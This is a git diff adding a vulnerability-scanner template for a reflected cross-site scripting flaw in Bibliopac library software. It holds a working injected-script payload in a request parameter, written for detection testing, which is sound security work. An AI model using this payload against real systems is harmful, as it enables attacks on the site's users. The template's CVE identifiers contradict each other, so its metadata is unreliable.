Add files via upload
parent
87c8326d8b
commit
f9bc6c9c85
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2018-16139
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: XSS on Bibliopac
|
||||||
|
author: atomiczsec
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Cross-site scripting (XSS) vulnerability in the library management/inventory software, Bibliopac from Bibliosoft.
|
||||||
|
reference:
|
||||||
|
- https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-2035
|
||||||
|
cwe-id: CWE-79
|
||||||
|
tags: cve,cve2018,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "|fatal error|unavoidable"
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue